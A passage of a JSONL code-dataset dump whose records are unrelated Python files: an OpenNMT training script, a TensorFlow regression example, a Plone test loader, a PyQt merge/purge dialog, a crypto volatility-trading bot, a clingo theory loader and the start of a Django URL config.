2\nDROPOUT_RATE = 0.1\nATTENTION_DROPOUT_RATE = 0.1\nLABEL_SMOOTHING = 0.1\nTRAIN_EPOCHS = 2000\nWARMUP_STEPS = 500\n\n\nif __name__ == \"__main__\":\n training_set_sizes = [1000,5000,10000,25000,50000,100000,1000000]\n training_set_sizes = [1000000]\n \n for training_set_size in training_set_sizes:\n print(\"### TRAINING MODEL - INFORMATION ###\")\n print(\"Random seed: \" + str(RANDOM_SEED))\n print(\"Training epochs: \" + str(TRAIN_EPOCHS))\n print(\"Warmup steps: \" + str(WARMUP_STEPS))\n print(\"RNN size: \" + str(RNN_SIZE))\n print(\"WordVec size: \" + str(WORD_VEC_SIZE))\n print(\"Dataset size: \" + str(training_set_size))\n print(\"Number of layers: \" + str(NUM_LAYERS))\n print(\"Number of heads: \" + str(NUM_HEADS))\n print(\"Size of hidden transformer feed-forward layer: \" + str(TRANSFORMER_FF))\n print(\"Batch size: \" + str(BATCH_SIZE))\n print(\"Accum count: \" + str(ACCUM_COUNT))\n print(\"Learning rate: \" + str(LEARNING_RATE))\n print(\"Dropout rate: \" + str(DROPOUT_RATE))\n print(\"Attention dropout rate: \" + str(ATTENTION_DROPOUT_RATE))\n print(\"Label smoothing: \" + str(LABEL_SMOOTHING))\n print(\"####################################\")\n\n\n trainingDataSaveDir = \"../Data/TrainingData/HumanMine/\" + str(training_set_size) + \"/\"\n\n # Using pre-trained word embeddings \n OpenNMTcmd = 'onmt_train -data ' + str(trainingDataSaveDir) \\\n + 'dataset -save_model ./Models/model-HumanMine-' + str(training_set_size) \\\n + ' --layers ' + str(NUM_LAYERS) + ' -heads ' + str(NUM_HEADS) + ' -rnn_size ' + str(RNN_SIZE) + ' -word_vec_size ' + str(WORD_VEC_SIZE) + ' -transformer_ff ' + str(TRANSFORMER_FF) + ' -max_generator_batches 2 -seed ' + str(RANDOM_SEED) + ' -batch_size ' + str(BATCH_SIZE) + ' -valid_batch_size ' + str(VALID_BATCH_SIZE) + ' -accum_count ' + str(ACCUM_COUNT) + ' -optim adam -adam_beta2 0.998 -encoder_type transformer -max_grad_norm 0 -decoder_type transformer -position_encoding -param_init_glorot -param_init 0 -batch_type tokens -decay_method noam -learning_rate ' + str(LEARNING_RATE) + ' -normalization tokens -train_steps ' \\\n + str(TRAIN_EPOCHS) + ' -pre_word_vecs_enc ' + str(trainingDataSaveDir) + 'embeddings.enc.pt -pre_word_vecs_dec ' + str(trainingDataSaveDir) + 'embeddings.dec.pt -valid_steps 100 -save_checkpoint_steps 500 -report_every 50 -dropout ' + str(DROPOUT_RATE) + ' -attention_dropout ' + str(ATTENTION_DROPOUT_RATE) + ' -label_smoothing ' + str(LABEL_SMOOTHING) + ''\n \n #print(OpenNMTcmd)\n\n process = subprocess.Popen(OpenNMTcmd, shell=True, stderr=subprocess.STDOUT)\n process.wait()\n","sub_path":"NLP/TrainModels.py","file_name":"TrainModels.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390152744","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 9 17:10:28 2019\n\n@author: vigupta\n\"\"\"\n\n# Basic calculations with tensorflow \n\nimport tensorflow as tf\nimport numpy as np \nimport pandas as pd\nimport matplotlib.pyplot as plt \n\nlearning_rate = 0.01 \ntraining_epochs = 2000\noptimizer_ctor = tf.train.GradientDescentOptimizer\ndisplay_step = 50 \n\ndata = np.matrix(pd.read_csv(\"linreg-multi-synthetic-2.csv\", header=None).values)\n\n#transpose just so that we get a matrix of shape nxm, m : # of samples \ntrain_X = data[:,0:2].T\ntrain_Y = data[:,2].T\nprint(train_X.shape)\nprint(train_Y.shape)\n\n#dimensions \nn=train_X.shape[0]\nm=train_X.shape[1]\n#lets work on the computation graph: \n\nX = tf.placeholder(shape = (n, None), name = \"X\", dtype = \"float32\")\nY = tf.placeholder(shape = (1, None), name=\"Y\", dtype = \"float32\")\n#The training variables \n#Wt1 = tf.get_variable(name = \"Wt1\", shape = (1, n))\n#bias1 = tf.get_variable(name = \"bias1\", shape = ())\n\nA= tf.add(tf.matmul(Wt1, X), bias1)\n\ncost = tf.reduce_sum(tf.pow(A-Y, 2))/(2*m)\noptimizer = optimizer_ctor(learning_rate).minimize(cost)\ntraining_costs=[]\n\nlog_name = \"%g, %s\" % (learning_rate, optimizer_ctor.__name__)\ntf.summary.scalar('C', cost)\nsummary_node = tf.summary.merge_all()\nsummary_writer = tf.summary.FileWriter(log_name)\nprint(\"Open log file with tensorboard\")\n\n#Run the initiliazer first \ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess: \n sess.run(init)\n print(\"Starting, W\" ,sess.run(Wt1))\n \n for epoch in range(training_epochs):\n c = sess.run(optimizer, feed_dict = {X:train_X, Y:train_Y})\n #summary_writer.add_summary(c)\n \n if epoch % display_step == 0:\n c = sess.run(cost, feed_dict = {X:train_X, Y:train_Y})\n training_costs.append(c)\n print (\"Epoch:\", '%04d' % (epoch), \"cost=\", \"{:.9f}\".format(c), \\\n \"W=\", sess.run(Wt1), \"b=\", sess.run(bias1))\n print (\"Epochs exhausted. Quitting the optimization !\")\n training_cost = sess.run(cost, feed_dict={X: train_X, Y: train_Y}) \n print (\"Training cost=\", training_cost, \"W=\", sess.run(Wt1), \"b=\", sess.run(bias1), '\\n')\n \nplt.plot(training_costs)\nplt.show()","sub_path":"Tensorflow-basics/MultipleRegression.py","file_name":"MultipleRegression.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"342955014","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/hvelarde/forcontent/idg/src/brasil.gov.portal/src/brasil/gov/portal/tests/test_robot.py\n# Compiled at: 2018-06-11 09:46:53\nfrom brasil.gov.portal.testing import ACCEPTANCE_TESTING\nfrom plone.testing import layered\nimport os, robotsuite, unittest\nnoncritical = [\n 'Expected Failure']\n\ndef test_suite():\n suite = unittest.TestSuite()\n current_dir = os.path.abspath(os.path.dirname(__file__))\n robot_dir = os.path.join(current_dir, 'robot')\n tests = [ os.path.join('robot', doc) for doc in os.listdir(robot_dir) if doc.endswith('.robot') and doc.startswith('test_') and 'acessibilidade' not in doc\n ]\n for test in tests:\n suite.addTests([\n layered(robotsuite.RobotTestSuite(test, noncritical=noncritical), layer=ACCEPTANCE_TESTING)])\n\n return suite","sub_path":"pycfiles/brasil.gov.portal-2.1.1-py2-none-any/test_robot.py","file_name":"test_robot.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"353599477","text":"\"\"\"\nMIT License\n\nCopyright (c) 2016 Zeke Barge\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nimport os\nfrom functools import partial\nfrom core.compat import QtGui, QtCore\nimport pandas as pd\nfrom qtpandas.models.DataFrameModel import DataFrameModel\nfrom core.ui.actions.merge_purge_ui import Ui_MergePurgeDialog\nfrom core.views.actions.push_grid import PushGridHandler, PushGridWidget\nfrom core.models.actions import FileViewModel\nfrom core.views.file import FileTableWindow\nfrom core.views.actions.map_grid import MapGridDialog\nfrom core.ctrls.dataframe import DataFrameModelManager\nfrom core.utility.widgets import create_standard_item_model\nfrom core.utility.pandatools import gather_frame_fields\n\n\nclass MergePurgeDialog(QtGui.QDialog, Ui_MergePurgeDialog):\n signalMergeFileOpened = QtCore.Signal(str) # file path\n signalSFileOpened = QtCore.Signal(str) # file path\n signalExecuted = QtCore.Signal(str, str, str) # source_path, dest_path, report_path\n\n def __init__(self, df_manager: DataFrameModelManager, parent=None, source_model=None):\n self.df_manager = df_manager\n QtGui.QDialog.__init__(self, parent)\n self.setupUi(self)\n self.source_model = source_model\n self._merge_view_model = FileViewModel()\n self._suppress_view_model = FileViewModel()\n self._suppress_files = {}\n self._merge_files = {}\n self._file_table_windows = {}\n self._field_map_grids = {}\n self._field_map_data = {}\n self.sortAscHandler = None\n self.sortOnHandler = None\n self.dedupeOnHandler = None\n self.uniqueFieldsHandler = None\n self.gatherFieldsHandler = None\n\n def configure(self, source_path=None, dest_path=None) -> bool:\n\n if source_path is None:\n source_path = self.sourcePathLineEdit.text()\n assert os.path.exists(source_path), \"source_path cannot be None, set \".format(source_path)\n self.set_line_edit_paths(source_path, dest_path=dest_path)\n if self.sortAscHandler is None:\n self.set_handler_sort_asc()\n\n self.signalMergeFileOpened.connect(self.add_merge_file)\n merge_file_func = partial(self.open_file, model_signal=self.signalMergeFileOpened)\n self.btnAddMergeFile.clicked.connect(merge_file_func)\n self.btnBrowseMergeFile.clicked.connect(merge_file_func)\n self.btnDeleteMergeFile.clicked.connect(partial(self.remove_file, self.mergeFileTable))\n self.btnEditMergeFile.clicked.connect(partial(self.open_edit_file_window, self.mergeFileTable, self._merge_files))\n self.mergeFileTable.setModel(self._merge_view_model)\n\n self.signalSFileOpened.connect(self.add_suppress_file)\n sfile_func = partial(self.open_file, model_signal=self.signalSFileOpened)\n self.btnEditSFile.clicked.connect(partial(self.open_edit_file_window, self.sFileTable, self._suppress_files))\n self.btnDeleteSFile.clicked.connect(partial(self.remove_file, self.sFileTable))\n self.btnAddSFile.clicked.connect(sfile_func)\n self.btnBrowseSFile.clicked.connect(sfile_func)\n self.sFileTable.setModel(self._suppress_view_model)\n self.btnMapSFields.clicked.connect(partial(self.open_field_map, self.sFileTable, self._suppress_files))\n self.btnMapMergeFields.clicked.connect(partial(self.open_field_map, self.mergeFileTable, self._merge_files))\n self.btnExecute.clicked.connect(self.execute)\n\n def set_source_model(self, model=None, configure=False):\n if not isinstance(model, DataFrameModel):\n if model is None:\n model = self.sourcePathLineEdit.text()\n if isinstance(model, str) and os.path.exists(model):\n model = self.df_manager.read_file(model)\n else:\n raise Exception(\"model parameter must be a filepath or a qtpandas.models.DataFrameModel\")\n self.source_model = model\n if configure:\n self.configure(source_path=self.source_model.filePath)\n self.set_push_grid_handlers()\n combo_model = create_standard_item_model(model.dataFrame().columns.tolist(),\n editable=False, checkable=True)\n self.primaryKeyComboBox.setModel(combo_model)\n\n def set_line_edit_paths(self, source_path, dest_path=None):\n if dest_path is None:\n dirname = os.path.dirname(source_path)\n base, ext = os.path.splitext(os.path.basename(source_path))\n dest_path = os.path.join(dirname, base + \"_merged\" + ext)\n self.sourcePathLineEdit.setText(source_path)\n self.destPathLineEdit.setText(dest_path)\n\n def set_push_grid_handlers(self, column_model=None, sorton_model=None, sortasc_model=None,\n dedupe_model=None, gather_model=None, unique_model=None):\n \"\"\"\n Sets all default push grid handlers for the dialog.\n\n :param column_model: (QStandardItemModel, default None)\n :param sorton_model: ((QStandardItemModel,list) default None)\n :param sortasc_model: ((QStandardItemModel,list) default None)\n :param dedupe_model: ((QStandardItemModel,list) default None)\n :return:\n \"\"\"\n\n if column_model is None:\n column_model = self.get_source_columns_model()\n\n self.set_handler_sort_on(column_model=None, default_model=sorton_model)\n self.set_handler_sort_asc(default_model=sortasc_model)\n self.set_handler_dedupe_on(column_model=None, default_model=dedupe_model)\n self.set_handler_gather_fields(column_model=None, default_model=gather_model)\n self.set_handler_unique_fields(column_model=None, default_model=unique_model)\n\n def set_handler_sort_on(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.sortOnHandler = PushGridHandler(left_model=column_model, left_view=self.sortOnLeftView,\n left_button=self.sortOnLeftButton,\n left_delete=True, right_model=default_model,\n right_view=self.sortOnRightView,\n right_button=self.sortOnRightButton)\n\n def set_handler_sort_asc(self, default_model=None):\n if self.sortAscHandler is None or default_model is not None:\n sort_asc = QtGui.QStandardItemModel()\n sort_asc.appendRow(QtGui.QStandardItem('True'))\n sort_asc.appendRow(QtGui.QStandardItem('False'))\n self.sortAscHandler = PushGridHandler(left_model=sort_asc, left_view=self.sortAscLeftView,\n left_button=self.sortAscLeftButton,\n left_delete=False, right_model=default_model,\n right_view=self.sortAscRightView,\n right_button=self.sortAscRightButton)\n\n def set_handler_dedupe_on(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.dedupeOnHandler = PushGridHandler(left_model=column_model, left_view=self.dedupeOnLeftView,\n left_button=self.dedupeOnLeftButton,\n left_delete=True, right_model=default_model,\n right_view=self.dedupeOnRightView,\n right_button=self.dedupeOnRightButton)\n\n def set_handler_gather_fields(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.gatherFieldsHandler = PushGridHandler(left_model=column_model,\n left_view=self.gatherFieldsListViewLeft,\n left_button=self.gatherFieldsButtonLeft,\n left_delete=True, right_model=default_model,\n right_view=self.gatherFieldsListViewRight,\n right_button=self.gatherFieldsButtonRight)\n\n def set_handler_unique_fields(self, column_model=None, default_model=None):\n if column_model is None:\n column_model = self.get_source_columns_model()\n self.uniqueFieldsHandler = PushGridHandler(left_model=column_model,\n left_view=self.uniqueFieldsListViewLeft,\n left_button=self.uniqueFieldsPushButtonLeft,\n left_delete=True, right_model=default_model,\n right_view=self.uniqueFieldsListViewRight,\n right_button=self.uniqueFieldsPushButtonRight)\n\n def get_source_columns_model(self ,raise_on_error=True):\n if self.source_model is None:\n if raise_on_error:\n raise Exception(\"Cannot get source_columns as source_model is None!\")\n else:\n columns = []\n else:\n columns = self.source_model.dataFrame().columns.tolist()\n\n return create_standard_item_model(columns)\n\n def open_file(self, file_names: list=None, model_signal=None):\n if file_names is None:\n file_names = QtGui.QFileDialog.getOpenFileNames(parent=self)\n #file_names = list(file_names[0])\n\n if isinstance(file_names, str):\n file_names = list(file_names)\n\n assert hasattr(file_names, \"__iter__\"), \"file_names is not iterable\"\n\n for f in file_names:\n try:\n if os.path.exists(f):\n self.df_manager.read_file(f)\n if model_signal is not None:\n model_signal.emit(f)\n print(\"Emitted signal: {}\".format(f))\n except Exception as e:\n print(e)\n\n @QtCore.Slot(str)\n def add_merge_file(self, file_path):\n model = self.df_manager.get_model(file_path)\n model.enableEditing(True)\n self._merge_files.update({file_path:model})\n self._merge_view_model.append_df_model(model)\n self.mergeFileTable.setColumnWidth(0, 500)\n\n @QtCore.Slot(str)\n def add_suppress_file(self, file_path):\n model = self.df_manager.get_model(file_path)\n model.enableEditing(True)\n self._suppress_files.update({file_path:model})\n self._suppress_view_model.append_df_model(model)\n self.sFileTable.setColumnWidth(0, 500)\n\n def remove_file(self, view, indexes=None):\n if indexes is None:\n indexes = [x.row() for x in view.selectedIndexes()]\n model = view.model()\n for idx in indexes:\n model.takeRow(idx)\n\n def open_field_map(self, view, models):\n \"\"\"\n Connects a MapGridDialog to help the user map field names that\n are different between the source DataFrameModel and the\n selected merge or suppression DataFrameModel.\n\n :param view: (QtGui.QTableView)\n The view that has a selected filepath\n :param models: (dict)\n The dictionary of {file_path:DataFrameModel} where\n dataframe columns can be gathered from.\n :return: None\n\n \"\"\"\n idx = view.selectedIndexes()[0]\n view_model = view.model()\n view_item = view_model.item(idx.row())\n view_item_text = view_item.text()\n\n try:\n self._field_map_grids[view_item_text].show()\n except KeyError:\n dfmodel = models[view_item_text]\n colmodel = dfmodel._dataFrame.columns.tolist()\n\n if self.source_model is None:\n self.set_source_model()\n\n source_colmodel = self.source_model._dataFrame.columns.tolist()\n\n fmap = MapGridDialog(parent=self)\n fmap.load_combo_box(source_colmodel, left=True)\n fmap.load_combo_box(colmodel, left=False)\n fmap.setWindowTitle(\"Map Fields\")\n fmap.labelLeft.setText(os.path.basename(self.source_model.filePath))\n fmap.labelRight.setText(os.path.basename(dfmodel.filePath))\n fmap.signalNewMapping.connect(lambda x: self._field_map_data.update({dfmodel.filePath: x}))\n\n self._field_map_grids[view_item_text] = fmap\n self._field_map_grids[view_item_text].show()\n\n def get_map_grid(self, file_path):\n return self._field_map_grids.get(file_path, None)\n\n def open_edit_file_window(self, view, models):\n \"\"\"\n Connects a DataFrameModel selected in the view\n to a FileTableWindow where the model can be edited.\n\n :param view: (QtGui.QTableView)\n The view that has a selected filepath\n :param models: (dict)\n The dictionary of {file_path:DataFrameModel}\n to supply the FileTableWindow\n :return: None\n \"\"\"\n idx = view.selectedIndexes()[0]\n vmodel = view.model()\n vitem = vmodel.item(idx.row())\n model = models.get(vitem.text())\n\n fp = model.filePath\n try:\n self._file_table_windows[fp].show()\n except KeyError:\n self._file_table_windows[fp] = FileTableWindow(model)\n self._file_table_windows[fp].show()\n\n def execute(self):\n \"\"\"\n Executes the merge_purge based upon the given settings.\n :return: None\n \"\"\"\n if self.source_model is None:\n self.set_source_model()\n\n suppressed_results = {}\n merged_results = {}\n source_path = self.sourcePathLineEdit.text()\n dest_path = self.destPathLineEdit.text()\n source_df = self.source_model.dataFrame().copy()\n source_df.loc[:, 'ORIG_IDXER'] = source_df.index\n source_size = source_df.index.size\n index_label = self.primaryKeyComboBox.currentText()\n\n sort_on = self.sortOnHandler.get_model_list(left=False)\n ascending = self.sortAscHandler.get_model_list(left=False)\n dedupe_on = self.dedupeOnHandler.get_model_list(left=False)\n gather_fields = self.gatherFieldsHandler.get_model_list(left=False)\n overwrite_existing = self.gatherFieldsOverWriteCheckBox.isChecked()\n\n # Make sure ascending/sort_on lists are equal.\n while len(sort_on) < len(ascending):\n ascending.append(False)\n\n while len(sort_on) > len(ascending):\n ascending.pop()\n\n # Get all merge models and merge.\n # Absorb all rows and columns\n for file_path, merge_model in self._merge_files.items():\n pre_size = source_df.index.size\n other_df = merge_model.dataFrame()\n if gather_fields:\n assert index_label in other_df.columns, \"DataFrameModel for {} missing column {}\".format(\n merge_model.filePath, index_label)\n source_df = gather_frame_fields(source_df, other_df, index_label=index_label,\n fields=gather_fields, copy_frames=True,\n append_missing=True, overwrite=overwrite_existing)\n else:\n source_df = pd.concat([source_df, other_df])\n merged_results.update({merge_model.filePath: source_df.index.size - pre_size})\n # Get all suppression models and suppress.\n for file_path, suppress_model in self._suppress_files.items():\n map_dict = self._field_map_data.get(file_path, {})\n sframe = suppress_model.dataFrame().copy()\n sframe.drop(['ORIG_IDXER'], axis=1, inplace=True, errors='ignore')\n\n if map_dict:\n # A mapping exists - rename the data and get the key_cols\n key_cols = list(map_dict.values())\n sframe.rename(columns=map_dict, inplace=True)\n else:\n # No mapping exists - Try to use the dedupe_on cols as key_cols\n key_cols = dedupe_on.copy()\n missing = [x for x in key_cols if x not in sframe.columns]\n if missing:\n raise KeyError(\"Suppression file {} must have a field mapping or \\\n have the dedupe column labels, it has neither!.\".format(\n suppress_model.filePath))\n\n sframe = sframe.loc[:, key_cols].drop_duplicates(key_cols)\n badframe = pd.merge(source_df, sframe, how='inner', left_on=key_cols, right_on=key_cols)\n source_df = source_df.loc[~source_df.index.isin(badframe.loc[:, 'ORIG_IDXER'].tolist()), :]\n suppressed_results.update({suppress_model.filePath: badframe.index.size})\n\n # Sort the data\n if sort_on and ascending:\n source_df.sort_values(sort_on, ascending=ascending, inplace=True)\n\n # Deduplicate the data.\n if dedupe_on:\n pre_size = source_df.index.size\n source_df.drop_duplicates(dedupe_on, inplace=True)\n dedupe_lost = pre_size - source_df.index.size\n else:\n dedupe_lost = 0\n\n # Export the data - done!\n source_df.drop(['ORIG_IDXER'], axis=1, inplace=True, errors='ignore')\n source_df.to_csv(dest_path, index=False)\n print(\"Exported: {}\".format(dest_path))\n\n merge_string = \"\\n\".join(\"Gained {} merging {}\".format(v, k) for k, v in merged_results.items())\n suppress_string = \"\\n\".join(\"Lost {} suppressing {}\".format(v, k) for k,v in suppressed_results.items())\n report = \"\"\"\n Merge Purge Report\n ==================\n Original Size: {}\n Final Size: {}\n Source Path: {}\n Output Path: {}\n\n\n Merge:\n ==================\n {}\n\n\n Purge:\n ==================\n {}\n\n\n Sort:\n ==================\n SORT BY: {}\n SORT ASCENDING: {}\n\n\n Dedupe:\n ==================\n DEDUPE ON: {}\n RECORDS LOST: {}\n\n\n\n \"\"\".format(source_size, source_df.index.size, source_path,\n dest_path, merge_string, suppress_string,\n sort_on, ascending, dedupe_on, dedupe_lost)\n\n report_path = os.path.splitext(dest_path)[0] + \"_report.txt\"\n with open(report_path, \"w\") as fh:\n fh.write(report)\n\n self.signalExecuted.emit(source_path, dest_path, report_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"zeex/core/views/actions/merge_purge.py","file_name":"merge_purge.py","file_ext":"py","file_size_in_byte":19809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"122397069","text":"import os\nimport configparser\nimport requests\nimport time\nimport datetime\nfrom Coin import Coin, State\nfrom function.get_account import get_account\nfrom function.order_stock import *\nfrom function.get_market_code import get_market_code\nfrom function.get_now_time import get_now_time\nfrom function.get_candles import get_candles\nfrom function.get_now_coin_info import get_now_coin_info\nfrom function.print_your_config import print_order_config\nfrom timeit import default_timer\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini', encoding='UTF8')\n\nVM_order_config = config['VB_ORDER']\ncandle_type: str = VM_order_config.get('CANDLE_TYPE')\nunit: int = VM_order_config.getint('MINUTE_CANDLE_UNIT')\npercent_buy_range: int = VM_order_config.getint('PERCENT_OF_BUY_RANGE')\npercent_of_buying: int = VM_order_config.getint('PERCENTS_OF_BUYING') # 추가\n\n\ndef short_volatility_strategy(coins_name: list):\n print_order_config(config.items(section=\"VB_ORDER\"))\n coin_dict = dict()\n for coin_name in coins_name:\n coin_dict[coin_name] = Coin(coin_name)\n while True:\n for coin in coin_dict.values():\n candles = get_candles('KRW-' + coin.coin_name, count=2, minute=unit)\n now = candles[0]['candle_date_time_kst']\n print(f'{get_now_time()} {coin.coin_name}({set_state_color(coin.state)})| '\n f'목표 가: {coin.buy_price:>11.2f}, 현재 가: {candles[0][\"trade_price\"]:>10}'\n f' ({set_dif_color(candles[0][\"trade_price\"], coin.buy_price)})')\n\n if coin.check_time != now:\n print(f'{coin.check_time} -> \\033[36m{now}\\033[0m')\n if coin.state == State.BOUGHT or coin.state == State.TRYBUY:\n sell_result = coin.sell_coin()\n if sell_result == \"Not bought\":\n print(f'\\033[100m{get_now_time()} {coin.coin_name}( ERROR)|\\033[0m')\n else:\n print(f'\\033[104m{get_now_time()} {coin.coin_name}( SELL)| '\n f'{int(get_sell_price(access_key))}\\033[0m')\n with open(\"../logs/VB_order.log\", \"a\") as f:\n f.write(f'{get_now_time()} {coin.coin_name}( SELL)| '\n f'{int(get_sell_price(access_key))}원\\n')\n if coin.state == State.TRYBUY:\n coin.cansel_buy()\n print(f'\\033[104m{get_now_time()} {coin.coin_name}( CANCEL)|\\033[0m')\n coin.check_time = now\n coin.variability = candles[1]['high_price'] - candles[1]['low_price']\n coin.buy_price = candles[0][\"opening_price\"] + coin.variability * (percent_buy_range / 100)\n else: # 시간이 동일하다면\n if coin.state == State.BOUGHT or coin.variability == 0:\n continue\n if candles[0]['trade_price'] <= coin.buy_price:\n continue\n\n # 매수\n limit = True\n buy_result = coin.buy_coin(price=10000, limit=limit)\n os.makedirs('../logs', exist_ok=True)\n if limit:\n print(f'\\033[95m{get_now_time()} {coin.coin_name}(TRYBUY)| '\n f'{buy_result.get(\"locked\"):>6}원\\033[0m')\n with open(\"../logs/VB_order.log\", \"a\") as f:\n f.write(f'{get_now_time()} {coin.coin_name}(TRYBUY)| '\n f'{buy_result.get(\"locked\"):>6}원\\033[0m')\n else:\n print(f'\\033[101m{get_now_time()} {coin.coin_name}( BUY)| '\n f'{int(get_buy_price(coin.coin_name))}원\\033[0m')\n with open(\"../logs/VB_order.log\", \"a\") as f:\n f.write(f'{get_now_time()} {coin.coin_name}( BUY)| '\n f'{int(get_buy_price(coin.coin_name))}원\\n')\n\n\ndef set_state_color(state) -> str:\n if state == State.BOUGHT:\n return f'\\033[91m{state.name:>6}\\033[0m'\n else:\n return f'{state.name:>6}'\n\n\ndef set_dif_color(a, b) -> str:\n value = (a - b) / a * 100\n if value < 0:\n return f'\\033[34m{value:>6.2f}%\\033[0m'\n else:\n return f'\\033[31m{value:>6.2f}%\\033[0m'\n\n\nif __name__ == '__main__':\n short_volatility_strategy(['BTC'])\n","sub_path":"deprecated/short_volatility_strategy.py","file_name":"short_volatility_strategy.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64256777","text":"from __future__ import print_function\nimport sys\nimport ctypes\nimport errno\nimport clingo\nimport inspect\n\ndef eprint(*args, **kwargs):\n \"\"\"\n Prints a warning to stderr\n \"\"\"\n print(*args, file=sys.stderr, **kwargs)\n\nclass Application(object):\n \"\"\"\n Application object as accepted by clingo.clingo_main().\n \"\"\"\n def __init__(self, name):\n \"\"\"\n Initializes the application setting the program name.\n See clingo.clingo_main().\n \"\"\"\n self.program_name = name\n self.version = \"0.1.0\"\n self.theories = []\n self.last_model = {}\n\n def __del__(self):\n for i in self.theories:\n if len(i) > 1:\n i[1].theory_destroy_propagator()\n\n def theory_main(self, prg, files):\n \"\"\"\n This method can be overloaded, on_model and on_statistics can be reused as callbacks\n \"\"\"\n\n def print_model(self, model, printer):\n \"\"\"\n Can be overriden to specify special formatted text output\n \"\"\"\n printer()\n\n \"\"\"\n Possibilities:\n Make my own theory symbol ->where to store\n Convert C Symbol to Python Symbol -> how\n from_c\n in tloader manually using c methods of clingo_symbol_t\n Use three char* for name, operator and value\n use .value on the ctype to get the value of the char_p\n\n Ideas to get the data from the propagator:\n Write an own python propagator -> is called for every thread AFTER all registered propagators, could be a good point to get data of partial assignment to theory variables\n Propagator could use check to be caled after each fixpoint -> make it configurable when the update occurs\n All propagators should be asked -> what to be asked for\n List of variables that are (partially) assigned (getFirst/getNext)\n For each variable, what is the current restriction\n Problem: What is it with python multithreading\n \"\"\"\n def on_model(self, model):\n \"\"\"\n Can be used as a callback function to extend the model with theory specific information\n \"\"\"\n for lib in self.theories:\n if len(lib) > 1:\n print(\"onModel\")\n lib[1].theory_on_model(ctypes.c_void_p(model._to_c))\n self.last_model[lib[1]] = []\n name = ctypes.byref(ctypes.c_char_p())\n op = ctypes.byref(ctypes.c_char_p())\n value = ctypes.byref(ctypes.c_char_p())\n print(\"calling assignment_first\")\n lib[1].theory_assignment_first(ctypes.c_uint(model.thread_id), name, op, value)\n print(\"called assignment_first\")\n while name != 0:\n print(name.value())\n return True\n\n def on_statistics(self, step, akku):\n \"\"\"\n Can be used as a callback function to extend the statistics with theory specific information\n \"\"\"\n for lib in self.theories:\n if len(lib) > 1:\n lib[1].theory_on_statistics(ctypes.c_void_p(step._to_c), ctypes.c_void_p(akku._to_c))\n return True\n\n def register_options(self, options):\n \"\"\"\n register all options for of all theories.\n \"\"\"\n for lib in self.theories:\n if len(lib) > 1:\n lib[1].theory_add_options(ctypes.c_void_p(options._to_c))\n def validate_options(self):\n \"\"\"\n validate all options for of all theories.\n \"\"\"\n for lib in self.theories:\n if len(lib) > 1:\n if not lib[1].theory_validate_options():\n return False\n return True\n\n def load(self, libname):\n \"\"\"\n Load a theory given the dynamic library name\n \"\"\"\n self.theories.append([libname])\n lib = self.theories[-1][0]\n libname = lib\n try:\n libname = ctypes.cdll.util.find_library(lib)\n except:\n pass\n eprint(\"Loading lib\", libname)\n loaded = False\n libnames = [libname, libname+\".so\", libname+\".dll\", \"lib\"+libname,\n \"lib\"+libname+\".so\", \"lib\"+libname+\".dll\"]\n for s in libnames:\n print(\"loading \" + s)\n try:\n loaded = ctypes.cdll.LoadLibrary(s)\n except:\n loaded = False\n if loaded != False:\n break\n if not loaded:\n raise IOError(errno.ENOENT, \"Library not found: \", libname)\n self.theories[-1].append(loaded)\n self.last_model[libname] = []\n\n def __load_propagators(self, prg):\n for lib in self.theories:\n if len(lib) > 1:\n lib[1].theory_create_propagator(ctypes.c_void_p(prg._to_c))\n\n def main(self, prg, files):\n \"\"\"\n Forwards the incremental solving loop.\n This function implements the Application.main() function as required by\n clingo.clingo_main().\n \"\"\"\n self.__load_propagators(prg)\n\n self.theory_main(prg, files)\n\n\n","sub_path":"tloader.py","file_name":"tloader.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"432984508","text":"# posts/urls.py\n\nfrom django.urls import path\n\nfrom .views import ModelPageView, CreatePostView, PhotoPageView, PhotoCreatePostView # new\nimport posts.views\n\n# from .filters import Userfilter\n#post url\n\n\nurlpatterns = [\n path('model/', ModelPageView.as_view(), name='model'),\n path('model/post/', CreatePostView.as_view(), name='post'),\n path('model/detail//', posts.views.detail, name=\"detail\"),\n\n 